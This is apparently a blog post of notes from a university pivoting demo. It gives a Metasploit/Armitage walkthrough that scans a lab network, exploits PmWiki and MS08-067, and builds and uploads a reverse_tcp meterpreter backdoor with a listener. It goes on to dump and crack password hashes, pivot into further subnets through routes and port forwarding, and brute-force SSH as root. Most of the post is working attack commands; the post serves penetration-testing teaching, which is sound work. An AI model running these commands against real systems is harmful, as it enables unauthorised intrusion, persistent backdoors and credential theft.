UoB pivoting demo

These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..

  • Open Armitage
  • Scan (nmap) 172.16.128.x and find web server
db_nmap -sT -Pn -T5 -O --open 
  • Find attacks
  • Visit site ( and attack
  • Exploit using CVE-2011-4453  (pmwiki) GUI fail -> use console
use exploit/multi/http/pmwiki_pagelist
set rhost
exploit -j
sessions -v
  • Check out the system (sysinfo,ps,getuid) no hashdump/winenum/route >> php-meterpreter not full functionality so...
  • Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
  • cat /root/Tools/meh.php
  • Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
  • Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost
set lport 8443
exploit -j
  • Open a Terminal and
  • Second session now has full system privs
  • Get hashdump
  • Crack with ophcrack
  • Check out routes with ipconfig/route (time to pivot!) 
route add 2
  • Scan subnet using arpscan
run arp_scanner -r
  • Scan hosts using metasploit tcp scanner
  • Locate windows server
  • Locate linux server
  • Compromise windows box
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
exploit -j
  • Take hash and crack with ophcrack
  • Compromise linux box
  • Create a forwarding tunnel to check out the web server
portfwd add -l 8080 -p 80 -r
  • Test php-cgi exploit on it on local browser (http://localhost:8080/configuration.php?-s)
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
run -j

Thats all for now..
Stay tuned :)

Popular Posts